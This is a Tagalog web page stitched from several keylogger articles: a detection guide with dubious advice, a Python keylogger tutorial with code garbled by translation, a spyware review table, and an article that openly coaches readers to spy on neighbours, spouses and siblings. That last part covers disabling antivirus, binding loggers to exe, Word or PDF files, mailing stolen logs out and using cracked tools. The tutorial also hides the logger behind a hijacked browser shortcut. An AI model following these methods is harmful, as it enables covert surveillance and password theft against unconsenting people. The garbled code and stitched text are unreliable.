Ano ang gamit ng keylogger?                  Information Security Laboratory Paghahanap at pag-alis ng mga keylogger

Mayroong iba't ibang uri ng mga trick na ginagamit ng mga hacker upang nakawin ang ating pagkakakilanlan.

Ang Keylogger ay isang nakakahamak na application o tool na ginagamit ng maraming hack para subaybayan kung ano ang tina-type namin at para kanino at kung paano kami kumonekta sa network. Ang Keylogger ay naging isa sa pinakamakapangyarihang banta sa mga araw na ito na maaaring magtala kung ano ang iyong tina-type at ibahagi ito sa mga hacker.

Ang pag-alam kung paano tuklasin ang isang keylogger at alisin ito sa iyong computer ay makakatulong na protektahan ang iyong pagkakakilanlan at privacy.

Hakbang-hakbang na gabay upang makita ang Keylogger at alisin ito sa iyong computer

Hindi madaling matukoy kung ang iyong computer ay apektado ng isang keylogger maliban kung ang gabay na ito ay kinikilala ito. Siyempre, may mga tool at software para maka-detect ng mga nakakahamak na banta, ang pag-alam kung paano tuklasin ang mga ito nang manu-mano ay maaaring maging kapaki-pakinabang pagdating sa pagprotekta sa iyong pagkakakilanlan.

Narito ang dalawang paraan kung saan matutukoy mo kung naka-install ang isang keylogger sa iyong device o hindi:

Paraan 1. Buksan ang task manager gamit ang keyboard shortcut na Ctrl + Alt + Delete. Pumunta sa opsyon sa mga proseso at maghanap ng duplicate na kopya ng prosesong pinangalanang Winlogon. Ang isang proseso na may ganitong pangalan ay maayos, ngunit kung mayroong dalawa sa kanila, kung gayon ang iyong device ay nahawaan ng isang keylogger.

Paraan 2: Minsan ang keylogger ay nakakahawa sa device sa pamamagitan ng ilang malware na awtomatikong naka-install sa iyong device kapag kami ay online. Ang paghahanap para sa hindi gustong program sa Control Panel ay maaaring magbunyag ng isang keylogger. Narito kung paano tuklasin ang isang hindi gustong program mula sa Control Panel:

Pumunta sa Start menu, piliin ang All Programs, at tingnan ang lahat ng naka-install na program. Kung makakita ka ng anumang program na hindi mo na-install, i-uninstall ito. Pagkatapos mag-alis ng hindi kinakailangang program, kailangan mong i-restart ang iyong device.

Paano tanggalin ang Keylogger

Kapag alam mo na kung paano mag-detect ng keylogger, dapat mong malaman kung paano ito alisin sa iyong computer. Maaaring alisin ang key locker mula sa device gamit ang sumusunod na dalawang paraan:

Paraan 1. Kung makakita ka ng keylogger sa task manager, tanggalin ang duplicate na kopya ng Winlogon.

Paraan 2. Kung makakita ka ng hindi kilalang program na naka-install sa iyong system, i-uninstall ang program.

Ang dalawang ito ay ang pinakamadaling paraan upang matukoy at maalis nang manu-mano ang keylogger mula sa iyong system. Ang mga manu-manong pamamaraan ay naglalatag ng pundasyon upang protektahan ang iyong computer mula sa mga malisyosong aktibidad at sa gayon ay makakatulong na maiwasan ang anumang data na manakaw.

Mayroon ding available na software sa merkado na makakatulong sa iyong makita ang mga keylogger at alisin ang mga ito sa iyong computer. Maaari mong matutunan kung paano tuklasin ang isang keylogger at alisin ito sa iyong computer sa pamamagitan ng pag-install ng software na maaaring makakita at mag-alis ng nakakahamak na tool.

Ini-scan ng software ang iyong computer para sa anumang malisyosong file na may kakayahang magnakaw ng impormasyong nakaimbak dito at ipadala ito sa mga hacker.

Kapag may nakitang mga nakakahamak na file, ikukuwarentina ng software ang mga ito at pinoproseso ang mga ito, tinatanggal o ibinabalik ang mga ito pagkatapos maghanap ng iyong koponan.

Hindi lamang ini-scan ng software ang computer, ngunit pinipigilan din o pinoprotektahan ang computer sa pamamagitan ng hindi pagpapagana sa awtomatikong pag-install ng anumang program na maaaring nasa panganib.

Ang Keylogger ay naging isang malaking banta dahil mas maraming tao ang gumagamit ng mga digital na gadget para sa iba't ibang gawain. Maging ito ay isang online na transaksyon o pribadong chat, maaaring i-hack ng mga keylogger ang mga detalye at i-record ang lahat ng iyong tina-type gamit ang keyboard ng aming device.

Dalawang uri ng keylogger at kung paano nakakaapekto ang mga ito sa iyong computer.

Ang Keylogger ay may dalawang uri: hardware keylogger at software keylogger.

Keylogger Hardware:

Ang hardware keylogger ay dumating sa anyo ng mga USB device na maaaring konektado sa computer system. Ang partikular na uri ng keylogger na ito ay binuo sa likod ng central processing unit (CPU) at kumukuha ng aktibidad sa keyboard.

Keylogger Software:

Ang isang software keylogger ay binuo sa software at program na naka-install o naka-install sa iyong computer. Kapag nag-install kami ng anumang software sa isang computer system, awtomatikong nalilikha ang ilang partikular na file. Ang mga file na ito ay maaaring masama at maaaring mag-record at magnakaw ng impormasyon mula sa iyong computer.

Hindi mahalaga kung anong uri ng keylogger ang apektado ng iyong computer, ang bawat keylogger ay maaaring magdulot ng hindi maibabalik na mga pagkalugi.

Samakatuwid, napakahalaga na makita kaagad ang keylogger upang maiwasan ang anumang mahalagang data na manakaw.

Maaari mong protektahan ang iyong computer sa pamamagitan ng pag-update ng iyong antivirus software. Ang paggamit ng mga virus detector ay madalas ding nakakatulong upang matukoy at maiwasan ang anumang malic program.

Mayroon ding isang trick upang maiwasan ang pagkawala ng anumang uri ng impormasyon sa pamamagitan ng keyboard, maaari kang mag-imbak ng data tulad ng username at password sa isang notepad at kopyahin at i-paste ang mga detalye kapag kinakailangan.

Gayunpaman, sa kasong ito, kakailanganin mong magkaroon ng higit na kamalayan sa data na nakaimbak sa notepad dahil maaaring nakawin ng mga hacker ang impormasyon. Ang panganib ng pag-hack ay nasa lahat ng dako, ngunit hindi ito dapat huminto sa amin mula sa paggamit ng mga digital na gadget.

Gumamit ng mga smart device nang may pagbabantay. Huwag hayaan ang isang bagay na tulad ng isang keylogger na pumigil sa iyo sa pagsulong sa iyong landas. Tiyaking napapanahon ang iyong computer system at gumagana nang maayos ang lahat ng program.

Ang regular na pagpapatakbo ng antivirus software ay makakatulong din na protektahan ang iyong computer kapag online ka pati na rin offline.

Hello, nandito na naman si QUAZAR. Ngayon ay ipapakita ko sa iyo kung paano lumikha ng isang simpleng keylogger sa Python. Siyempre, ang keylogger na ito ay hindi maaaring makipagkumpitensya sa mga higanteng tulad, ngunit sa kabila nito, mahahanap nito ang paggamit nito.

Ano ang isang keylogger?

Mababasa mo nang detalyado ang tungkol sa kung ano ang keylogger at tungkol sa mga uri ng keylogger sa artikulong "". Upang makahanap ng mga karagdagang materyales sa paksa, gamitin ang paghahanap sa site, na matatagpuan sa kanang sulok sa itaas. Ipasok lamang ang salitang "keylogger" o "keylogger".

Simpleng keylogger sa Python

Upang lumikha ng isang keylogger kailangan namin:

• Operating system: Windows o MacOs (anumang Linux ay maaari ding gamitin, ngunit hindi ko pa ito personal na sinubukan)
• Naka-install ang Python sa target na makina, pati na rin ang mga espesyal na aklatan.

Ang materyal na ito ay para sa mga layuning pang-impormasyon lamang. Ang impormasyong ipinakita sa artikulong ito ay ibinigay para sa mga layuning pang-impormasyon lamang. Ang mga editor ng website na www.site o ang may-akda ng publikasyon ay walang pananagutan para sa anumang pinsalang dulot ng materyal sa artikulong ito.

Paglikha ng isang simpleng keylogger sa Python

Una kailangan mong i-download at i-install ang Python.

Simpleng keylogger sa Python

Pagkatapos i-install ang Python, kailangan mong i-install ang "pyHook" at "pywin32" na mga module. Sa site na ito makikita mo ang 32 at 64 bit na bersyon para sa Windows at iba pang mga OS. I-download ang "PYhook" at "pyWin32" ayon sa iyong naka-install na bersyon ng Python at Windows (32bit o 64bit).

Keylogger sa Python. PYhook module
Keylogger sa Python. pyWin32 module

Kapag na-download na, i-install at buksan ang IDLE (Python GUI) na menu mula sa Start menu.

Simpleng keylogger sa Python

Pumunta sa menu na "File" at mag-click sa item na "Bagong File". Pagkatapos ay i-paste ang keylogger code:

#Pangalan: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, pag-log
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
ibalik ang Totoo
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

At i-save ito sa pamamagitan ng pagtawag sa file na Keylogger.pyw. Huwag lamang i-save ang file sa root directory C: kung saan kailangan mo ng mga karapatan ng administrator upang kopyahin at tanggalin ang mga file. Lumikha ng bagong folder sa iyong C: drive o sa ibang lokasyon kung saan hindi mo kailangan ng mga karapatan ng administrator upang kopyahin ang mga file at i-save ang Keylogger.pyw doon.

Maaari kang pumili ng anumang lokasyon bilang file ng ulat ng output na "file_log = "C:keyloggerlog.txt", ngunit mas mabuti, siyempre, ilang nakatagong lokasyon sa iyong hard drive. Sa halimbawang ito, ise-save ko ang file ng ulat sa disk sa root directory C:. Tutal wala naman akong tinatago.

Awtomatikong paglulunsad ng isang keylogger sa Python

Handa na ang keylogger. Ngayon kailangan nating tiyakin na ang keylogger ay magsisimulang nakatago mula sa user at awtomatiko kapag nag-boot ang Windows. Ito ay maaaring ipatupad sa iba't ibang paraan. Subukan nating gawin ito gamit ang isang bat file sa pamamagitan ng pag-link sa paglulunsad ng keylogger sa ilang programa o sa pamamagitan ng pagrehistro nito sa startup.

Una, lumikha ng isang bat file. Kopyahin at i-paste ang sumusunod na code sa Notepad:

::Pangalan: QUAZAR
::Website: www.site
@echo off
simulan ang "" "C:keyloggerkeylogger.pyw"
simulan ang "" "C:Program FilesOperalauncher.exe"

Sa unang linya kailangan mong ipasok ang landas sa keylogger.pyw file (sa aking kaso "C:keylogger.pyw"). Sa pangalawang linya, dapat mong ipasok ang landas sa programa na karaniwang ginagamit ng gumagamit (sa aking kaso, ang browser ng Opera).

Pagkatapos mag-edit, i-save ang file na may extension na .bat (sa aking kaso logger.bat) sa ilang nakatagong lokasyon sa iyong computer (sa aking kaso sa “C:keylogger.bat”).

Ngayon pumunta sa desktop at pumili ng isang shortcut para sa isang madalas na ginagamit na programa (sa aking kaso, ito ang Opera browser). I-right-click ang mouse upang tawagan ang menu ng konteksto at pumunta sa mga katangian ng shortcut. Sa field na “Object”, ilagay ang path sa keylogger bat file na “C:keyloggerlogger.bat”.

Pagkatapos gumawa ng mga pagbabago, magbabago din ang icon ng shortcut. Ngunit madali itong malulutas sa tab na mga katangian (tingnan ang screenshot sa itaas).

Iba't ibang spy program ang kailangan sa mga kondisyon kung saan maraming tao ang may access sa isang computer.

Sa mga sitwasyong ito, maaaring gusto ng user na malaman kung aling mga site ang binisita mula sa kanyang computer (halimbawa, ng mga bata), kung ang mga credit card ay ninakaw gamit ang mga naka-save na password, atbp. Upang linawin ang mga isyung ito, ito ay kinakailangan.

Papayagan ka ng aming pagsusuri na gawin ang pinakamahusay na pagpipilian.

Mga tampok ng pagpili

Ano nga ba ang keylogger? Ito ay isang programa na, mahigpit na pagsasalita, ay hindi direktang nauugnay sa keyboard.

Naka-install ito sa memorya ng computer at gumagana. Kadalasan, ang mga palatandaan ng aktibidad nito ay hindi nakikita sa computer maliban kung partikular mong hinahanap ang mga ito.

Ang ganitong programa ay hindi direktang nakikipag-ugnayan sa keyboard, iyon ay, gumagana ito sa isang programa sa PC na nagko-convert ng mga signal na natanggap ng processor bilang resulta ng pagpindot sa mga pindutan sa teksto kapag nagpi-print.

Iyon ay, ang pagkilos ng naturang software ay naglalayong mangolekta ng impormasyong ipinasok sa pamamagitan ng keyboard.

Ang mga naturang utility ay may iba't ibang uri - kasama ang ilan, maaari mong tingnan ang lahat ng tekstong nai-type sa keyboard, kasama ang iba - kung ano lamang ang nai-type sa browser o sa anumang napiling application.

Ang ilang mga programa ay nagbibigay ng kakayahang i-configure ang mga naturang tagapagpahiwatig, ang iba ay hindi.

Magkaiba rin sila sa isa't isa sa antas ng pagiging lihim. Halimbawa, ang aktibidad ng ilan ay halata, ang isang shortcut ay nananatili sa Desktop, atbp., tulad ang mga programa ay angkop para sa pagsubaybay sa mga aktibidad ng, halimbawa, mga bata.

Ang mga bakas ng presensya at aktibidad ng iba ay hindi napapansin - kumikilos sila na nakatago at angkop para sa pag-install sa computer ng ibang tao, kapag ang katotohanan ng pag-install ay kailangang itago mula sa isang third-party na user.

Dahil sa gayong pagkakaiba-iba, ang pagpili ng pinaka-angkop na software ay maaaring maging mahirap.

Ang materyal na ito ay nagpapakita ng TOP ng pinakamahusay na mga programa na maaaring magamit para sa layuning ito. Mas madaling pumili ng tama sa kanila.

Mga pagtutukoy

Upang gawing simple ang proseso ng pagpili ng software, ipinapakita ng talahanayan sa ibaba ang mga pangunahing katangian ng paghahambing ng lahat ng mga program na kasama sa TOP.

Pangalan	Uri ng lisensya	Uri ng impormasyong nakolekta	Functional	Disenyo
SC-KeyLog	Libre	Lahat	Malapad	Pinasimple
WideStep Handy Keylogger	Libre/Bayad	Lahat	Malapad	Improved
Tunay na Spy	Binayaran	Lahat	Napakalawak	Pamantayan
EliteKeylogger	Binayaran	Lahat	Malapad	Pamantayan
Ang daga!	Libre/Bayad	Mas mababa kaysa dati	Medyo malawak	Hindi aesthetic
SPYGO	Libre	Depende sa bersyon	Depende sa bersyon	Karaniwang hitsura ng Windows
Ardamax Keylogger 2.9	Libre	Mula sa keyboard	Nakipot	Pinasimple
Personal na Monitor ng NS Keylogger 3.8	Libre	Lahat	Nakipot	Pinasimple
KGB Spy	Binayaran	Mula sa keyboard + bukas na mga programa	Makitid	Simple
Golden Keylogger 1.32	Libre	Mula sa keyboard	Napakakitid	Simple

Batay sa mga katangian mula sa talahanayang ito, madaling piliin ang program na pinakaangkop sa iyong mga partikular na pangangailangan.

Ang mga kagamitang ito ay inilalarawan nang mas detalyado sa ibaba.

SC-KeyLog

Ito ay isang napakalaki at functional na programa ng espiya na ibinahagi nang walang bayad.

Bilang karagdagan sa partikular na impormasyon sa pagsubaybay na ipinasok mula sa keyboard, nakakakuha din ito ng mga address ng mga binisita na site, password, at bukas na mga window ng browser.

Nagbibigay ng kumpletong impormasyon tungkol sa lahat ng mga aksyon na ginawa sa computer. Sa kasong ito, ang nabuong file ay maaaring matingnan nang malayuan mula sa isa pang device.

• Posibilidad ng malayuang pag-access sa isang file mula sa isa pang device;
• Walang mga bakas ng aktibidad ng programa sa computer na may tamang mga setting;
• Iba't ibang mga nakolektang data - ang impormasyon tungkol sa halos lahat ng mga aksyon sa PC ay maaaring ma-access.

• Nagse-save lamang ng mga password hanggang NT0;
• Masyadong simpleng menu at unaesthetic na disenyo;
• Isang medyo hindi maginhawang format para sa pagpapakita ng resulta.

Ano ang sinasabi ng mga user na aktibong gumagamit ng software na ito? "Ganap na hindi nakikita ng user", "Regular na dumarating ang data sa pamamagitan ng email."

WideStep Handy Keylogger

Ang application na ito ay ibinahagi nang walang bayad. Ang buong bayad na bersyon ay nagkakahalaga ng $35.

Medyo isang kawili-wili at functional na programa na nagkakahalaga ng pera kung handa kang bayaran ito.

Natatanging katangian– ang kakayahang magpadala ng naitala na data sa isang tinukoy na dalas. Kung hindi, ito ay gumagana nang maayos, madalas na mas matatag kaysa sa iba pang mga programa sa listahang ito.

• Koleksyon ng iba't ibang uri ng impormasyon;
• Kumpletong invisibility ng trabaho sa computer ng user;
• Simpleng interface at mga kontrol.

• Ang disenyo ay mas mahusay kaysa sa nakaraang programa, ngunit hindi pa rin mahusay;
• Ang format ng pagpapakita ng resulta ay hindi maginhawa;
• Ang bayad na bersyon ay medyo mahal.

Ang mga opinyon ng mga gumagamit tungkol sa software na ito ay ang mga sumusunod: “Maginhawa, simple at functional na programa. Medyo invisible kapag nagtatrabaho."

Tunay na Spy

Ito ay isang functional at kumplikadong bayad na programa na nagkakahalaga ng 600 rubles. Gayunpaman, mayroon itong demo na bersyon na libre.

Tampok ng software na ito– kakayahan sa isang takdang panahon.

Nakakatulong ito na malutas ang problema sa pagpasok ng isang graphic na password/key, na kamakailan lamang ay naging laganap.

• Maraming mga uri ng impormasyong nakolekta kasama ang kakayahang kumuha ng mga screenshot mula sa screen sa isang tinukoy na panahon;
• Ang isang malaking bilang ng iba pang mga karagdagang pag-andar at tampok;
• Itinatala hindi lamang ang mga aksyon, kundi pati na rin ang oras na ginawa ang mga ito;
• Ine-encrypt ang nabuong log.

• Ang tagal ng trabaho (pagkolekta ng impormasyon) sa libreng bersyon ng demo ay 40 minuto;
• Bayad na pamamahagi, bagama't higit pa o hindi gaanong makatwirang presyo;
• Ang bigat ng programa ay medyo malaki.

Ang mga pagsusuri ng gumagamit ng application na ito ay ang mga sumusunod: "Ang programa ay mahusay. Magaling na mga programmer!"

EliteKeylogger

Bayad na programa na may medyo mataas na presyo– 69 dolyar. Ito ay ganap na hindi natukoy sa isang PC sa mababang antas na mode, na ginagawa itong halos ganap na hindi matukoy.

Kawili-wili at maginhawang tampok– awtomatikong paglulunsad ng software, na nangyayari kasabay ng paglulunsad ng system mismo.

Mahirap matukoy o hindi matukoy kahit na ng mga espesyal na anti-keylogger.

• Ganap na nakatagong pagkilos at mahirap matukoy;
• Low-level na driver-type na operating format at awtomatikong startup kapag nag-boot ang system;
• Sinusubaybayan din nito ang mga pagpindot hindi lamang sa pangunahing, kundi pati na rin sa mga key ng serbisyo sa keyboard.

• Isang medyo kumplikadong sistema para sa pag-install ng programa sa isang PC;
• Ang programa ay mahal, ngunit maaari kang makahanap ng isang lumang na-hack na bersyon sa Russian Internet;
• Isang medyo kumplikadong sistema ng mga indibidwal na setting ng programa, na, gayunpaman, ay nagbibigay-katwiran sa sarili nito.

Ano ang sinasabi ng mga gumagamit tungkol sa software na ito? "Magandang programa", "Medyo kulang sa Jetlogger."

Ang daga!

Medyo isang pangkaraniwan at sikat, functional na utility na may bayad na lisensya.

Gayunpaman, para sa pribadong paggamit, isang libreng demo na bersyon ay ibinigay para sa isang limitadong panahon.

Ang programa ay napaka-simple– anumang advanced na user ay maaaring magsulat ng pareho. Gayunpaman, ito ay ganap na hindi natutuklasan ng mga antivirus at mga espesyal na programa na nakakakita ng naturang software.

• Ang pagiging simple, pag-andar at mataas na katatagan;
• Minimum na bigat ng file at espasyo na inookupahan nito sa computer;
• Medyo maraming mga setting.

• Isang medyo hindi kanais-nais na disenyo, na ginawa sa itim, puti at pula;
• Ang pag-andar ay medyo mas makitid kaysa sa mga program na inilarawan dati;
• Hindi maginhawang pagtingin sa log at sa pangkalahatan ay hindi maginhawang interface at paggamit.

Sinasabi ng mga gumagamit ang sumusunod tungkol sa program na ito: "Gumagana ito nang matatag, ngunit medyo simple," "Maganda ang programa, pinapayagan ka nitong mangolekta ng data nang hindi napapansin."

SPYGO

Ito ay isang panimula na bagong keylogger, na idinisenyo upang gumana at binuo ng isang Russian programmer.

Sino sa atin ang hindi nagnanais na maging isang cool na hacker kahit isang beses at makasira ng kahit ano? :) Kahit na hindi, pag-usapan natin kung gaano kasarap makakuha ng password mula sa iyong mail/social network. ang network ng isang kaibigan, asawa/asawa, kasama sa kuwarto ay naisip kahit minsan ng lahat. :) Oo, at kailangan mong magsimula sa isang lugar, pagkatapos ng lahat! Ang isang makabuluhang bahagi ng mga pag-atake (pag-hack) ay nagsasangkot ng pag-impeksyon sa computer ng biktima gamit ang tinatawag na mga keylogger (spyware).

Kaya, sa artikulong ngayon ay pag-uusapan natin kung ano mga libreng programa para sa pagsubaybay sa mga computer na nakabatay sa bintana, kung saan maaari mong i-download ang kanilang mga buong bersyon, kung paano mahawahan ang computer ng biktima sa kanila, at ano ang mga tampok ng kanilang paggamit.

Ngunit una, isang maliit na pagpapakilala.

Ano ang mga keylogger at bakit kailangan ang mga ito?

Sa tingin ko ikaw mismo ang nahulaan kung ano ito. Bilang isang patakaran, ang mga ito ay isang uri ng programa na nakatago (bagaman hindi ito palaging nangyayari) na naka-install sa computer ng biktima, pagkatapos nito ay ganap na naitala ang lahat ng mga keystroke sa node na ito. Bukod dito, bilang karagdagan sa mga pag-click mismo, ang mga sumusunod ay karaniwang naitala: ang petsa at oras ng pag-click (aksyon) at ang programa kung saan isinagawa ang mga pagkilos na ito (browser, kasama ang address ng website (hurray, agad naming nakikita kung ano ang mga password ay para sa!); lokal na aplikasyon; mga serbisyo ng system (kabilang ang mga password sa pag-login sa Windows), atbp.).

Mula dito ang isa sa mga problema ay agad na nakikita: Nakakuha ako ng access sa computer ng aking kapitbahay sa loob ng ilang minuto at gusto kong makuha ang kanyang password mula sa VK! Nag-install ako ng miracle program at ibinalik ang computer. Paano ako makakahanap ng mga password sa ibang pagkakataon? Naghahanap ng paraan para kunin muli ang computer mula sa kanya? Ang mabuting balita ay: kadalasan hindi. Karamihan sa mga keylogger ay may kakayahang hindi lamang mag-imbak ng buong naipon na database ng mga aksyon sa lokal, ngunit ipadala din ito nang malayuan. Mayroong maraming mga pagpipilian para sa pagpapadala ng mga log:

• Ang isang nakapirming e-mail (maaaring marami) ay ang pinaka-maginhawang opsyon;
• FTP server (sino ang mayroon nito);
• SMB server (exotic, at hindi masyadong maginhawa).
• Isang nakapirming flash drive (ipasok mo ito sa USB port ng computer ng biktima, at ang lahat ng mga log ay awtomatikong kinopya doon sa invisible mode!).

Bakit kailangan ang lahat ng ito? Sa tingin ko ay halata ang sagot. Bilang karagdagan sa karaniwang pagnanakaw ng mga password, ang ilang keylogger ay maaaring gumawa ng ilang iba pang magagandang bagay:

• Pag-log ng sulat sa mga tinukoy na social network. mga network o instant messenger (halimbawa, Skype).
• Pagkuha ng mga screenshot ng screen.
• Tingnan/kuhanan ang data ng webcam (na maaaring maging lubhang kawili-wili).

Paano gamitin ang mga keylogger?

At ito ay isang mahirap na tanong. Kailangan mong maunawaan na hindi sapat ang paghahanap lamang ng maginhawa, functional, at mahusay na keylogger.

Kaya, ano ang kailangan para matagumpay na gumana ang isang spy program?:

• Access ng administrator sa isang malayuang computer.
  Bukod dito, hindi ito nangangahulugan ng pisikal na pag-access. Madali mong ma-access ito sa pamamagitan ng RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, atbp.
  Bilang isang patakaran, ang pinakadakilang mga paghihirap ay nauugnay sa puntong ito. Gayunpaman, nagsulat ako kamakailan ng isang artikulo tungkol sa kung paano makakuha ng mga karapatan ng administrator sa Windows.
• Anonymous na e-mail / ftp (kung saan hindi ka makikilala).
  Siyempre, kung sinisira mo si Tiya Shura para sa iyong kapitbahay, ang puntong ito ay maaaring ligtas na maalis. Tulad ng kaso kung palagi mong nasa kamay ang computer ng biktima (ala, alamin ang mga password ng iyong kapatid na lalaki / babae).
• Kakulangan ng gumaganang mga antivirus / panloob na sistema ng proteksyon ng Windows.
  Karamihan sa mga pampublikong keylogger (na tatalakayin sa ibaba) ay kilala sa karamihan ng antivirus software (bagama't may mga logger virus na naka-built in sa OS kernel o driver ng system, at hindi na made-detect o sirain ng mga antivirus ang mga ito, kahit na mayroon sila. nakita sila). Dahil sa nabanggit, ang anti-virus software, kung mayroon man, ay kailangang walang awang sirain. Bilang karagdagan sa mga antivirus, ang mga system tulad ng Windows Defender (mga unang lumabas sa Windows 7 at mas bago) ay nagdudulot din ng panganib sa aming spyware. Nakikita nila ang kahina-hinalang aktibidad sa software na tumatakbo sa isang computer. Madali kang makakahanap ng impormasyon kung paano mapupuksa ang mga ito sa Google.

Ang mga ito, marahil, ay ang lahat ng kailangan at sapat na mga kondisyon para sa iyong tagumpay sa larangan ng pagnanakaw ng mga password / sulat / larawan ng ibang tao o kung ano pa man ang gusto mong salakayin.

Anong mga uri ng spyware ang naroroon at saan ko mada-download ang mga ito?

Kaya, simulan natin ang pagsusuri sa mga pangunahing keylogger na ginamit ko sa aking pang-araw-araw na pagsasanay na may mga link sa mga libreng pag-download ng kanilang buong bersyon (ibig sabihin, ang lahat ng mga bersyon ay ang pinakabago sa ngayon (kung saan posible na makahanap ng lunas) at may gumagana na at nasubok na ang mga bitak).

0. Ang Daga!

Mga rating (sa 10):

• Palihim: 10
• Kaginhawaan/kakayahang magamit: 9
• Pag-andar: 8

Ito ay isang bomba lamang, hindi isang keylogger! Sa kondisyon ng pagtatrabaho, ito ay tumatagal ng 15-20 KB. Bakit magugulat: ito ay ganap na nakasulat sa wika ng pagpupulong (ang mga beteranong programmer ay lumuha) at karamihan ay isinulat ng mga masigasig na hacker, dahil sa kung saan ang antas ng pagiging lihim nito ay kahanga-hanga lamang: ito ay gumagana sa antas ng OS kernel!

Bilang karagdagan, kasama sa package ang FileConnector - isang mini-program na nagpapahintulot sa iyo na ikonekta ang keylogger na ito sa ganap na anumang programa. Bilang isang resulta, makakakuha ka ng isang bagong exe ng halos parehong laki, at kapag inilunsad, ito ay gumagana nang eksakto tulad ng programa kung saan mo ito pinagdikit! Ngunit pagkatapos ng unang paglunsad, ang iyong keylogger ay awtomatikong mai-install sa invisible mode na may mga parameter para sa pagpapadala ng mga log na dati mong tinukoy. Maginhawa, hindi ba?

Isang mahusay na pagkakataon para sa social engineering (magdala ng file/pagtatanghal ng laro sa isang kaibigan sa isang flash drive, o kahit na isang Word document lamang (Sasabihin ko sa iyo kung paano gumawa ng exe file na naglulunsad ng isang partikular na word/excel file sa isa sa ang aking mga susunod na artikulo), ilunsad, lahat ay maayos at kahanga-hanga, ngunit ang kaibigan ay hindi nakikitang nahawaan!). O ipadala mo lang ang file na ito sa isang kaibigan sa pamamagitan ng koreo (mas mabuti ang isang link upang i-download ito, dahil ipinagbabawal ng mga modernong mail server ang pagpapadala ng mga exe file). Siyempre, mayroon pa ring panganib mula sa mga antivirus sa panahon ng pag-install (ngunit hindi ito iiral pagkatapos ng pag-install).

Sa pamamagitan ng paraan, sa tulong ng ilang iba pang mga diskarte maaari mong idikit ang anumang nakatagong distribusyon ng pag-install (matatagpuan ang mga ito sa The Rat! at Elite keylogger) hindi lamang sa mga exe file (na nagpapataas pa rin ng hinala sa mas marami o hindi gaanong advanced na mga gumagamit), ngunit din sa ordinaryong salita / excel at kahit pdf file! Walang sinuman ang mag-iisip ng anuman tungkol sa isang simpleng pdf, ngunit hindi iyon ang kaso! :) Kung paano ito ginagawa ay ang paksa ng isang buong hiwalay na artikulo. Ang mga masigasig ay maaaring sumulat sa akin ng mga tanong sa pamamagitan ng form ng feedback. ;)

Sa pangkalahatan, Ang Daga! maaaring ilarawan sa napakahabang panahon at marami. Ito ay mas mahusay kaysa sa akin. May download link din doon.

1. Elite keylogger

Mga rating (sa 10):

• Palihim: 10
• Kaginhawaan/kakayahang magamit: 9
• Pag-andar: 8

Marahil isa sa mga pinakamahusay na keylogger na nilikha. Ang mga kakayahan nito, bilang karagdagan sa karaniwang hanay (interception ng lahat ng mga pag-click sa konteksto ng mga application / windows / site), kasama ang interception ng mga instant messenger message, mga larawan mula sa isang webcam, at gayundin - na NAPAKA-importante! - pagharang ng mga password ng serbisyo ng WinLogon. Sa madaling salita, naharang nito ang mga password sa pag-login sa Windows (kabilang ang mga domain!). Naging posible ito salamat sa trabaho nito sa antas ng driver ng system at ilunsad kahit na sa yugto ng OS boot. Dahil sa parehong tampok na ito, ang program na ito ay nananatiling ganap na hindi nakikita ng parehong Kasperosky at lahat ng iba pang anti-malware software. Sa totoo lang, wala pa akong nakilalang keylogger na may kakayahang ganito.

Gayunpaman, hindi mo dapat masyadong dayain ang iyong sarili. Ang installer mismo ay kinikilala ng mga antivirus nang napakadali at upang mai-install ito kakailanganin mo ang mga karapatan ng administrator at hindi paganahin ang lahat ng mga serbisyo ng antivirus. Pagkatapos ng pag-install, ang lahat ay gagana nang perpekto sa anumang kaso.

Bilang karagdagan, ang inilarawang tampok (gumagana sa antas ng kernel ng OS) ay nagpapakilala ng mga kinakailangan para sa bersyon ng OS kung saan gagana ang mga keylogger. Ang Bersyon 5-5.3 (mga link kung saan ay ibinigay sa ibaba) ay sumusuporta sa lahat hanggang sa at kabilang ang Windows 7. Ang Win 8 / 10, pati na rin ang Windows server family (2003 / 2008 / 2012) ay hindi na suportado. Mayroong bersyon 6, na gumagana nang perpekto, kasama. sa panalo 8 at 10, gayunpaman, kasalukuyang hindi posible na makahanap ng isang basag na bersyon. Malamang na ito ay lilitaw sa hinaharap. Pansamantala, maaari mong i-download ang Elite keylogger 5.3 mula sa link sa itaas.

Walang network operation mode, samakatuwid ito ay hindi angkop para sa paggamit ng mga employer (upang subaybayan ang mga computer ng kanilang mga empleyado) o isang buong grupo ng mga tao.

Ang isang mahalagang punto ay ang kakayahang lumikha ng distribusyon ng pag-install na may mga paunang natukoy na setting (halimbawa, na may tinukoy na email address kung saan kailangang ipadala ang mga log). Kasabay nito, sa dulo makakakuha ka ng isang distribution kit na, kapag inilunsad, ay hindi nagpapakita ng ganap na anumang mga babala o mga bintana, at pagkatapos ng pag-install ay maaari pa itong sirain ang sarili nito (kung susuriin mo ang naaangkop na opsyon).

Maraming mga screenshot ng bersyon 5 (upang ipakita kung gaano kaganda at maginhawa ang lahat):

2. All-in-one na keylogger.

Mga rating (sa 10):

• Palihim: 3
• Kaginhawaan/kakayahang magamit: 9
• Pag-andar: 8

Ito rin ay isang napaka-maginhawang bagay. Ang pag-andar ay nasa antas ng Elite keylogger. Ang mga bagay ay mas malala sa pagiging lihim. Ang mga password ng Winlogon ay hindi na naharang, ito ay hindi isang driver, at hindi naka-built sa kernel. Gayunpaman, ito ay naka-install sa system at nakatagong mga direktoryo ng AppData, na hindi gaanong madaling ma-access ng mga hindi awtorisadong user (hindi sa ngalan kung kanino ito naka-install). Gayunpaman, ang mga antivirus sa maaga o huli ay matagumpay na nagagawa ito, na ginagawang ang bagay na ito ay hindi partikular na maaasahan at ligtas kapag ginamit, halimbawa, sa trabaho upang tiktikan ang iyong mga nakatataas. ;) Ang pagdikit nito sa isang bagay o pag-encrypt ng code upang itago ito sa mga antivirus ay hindi gagana.

Gumagana sa anumang bersyon ng Win OS (na maganda at praktikal).

Tulad ng para sa iba, maayos ang lahat: ini-log nito ang lahat (maliban sa mga password sa pag-login sa Windows), ipinapadala ito kahit saan (kabilang ang e-mail, ftp, fixed flash drive). Sa mga tuntunin ng kaginhawaan, lahat ay mahusay din.

3. Spytech SpyAgent.

Mga rating (sa 10):

• Palihim: 4
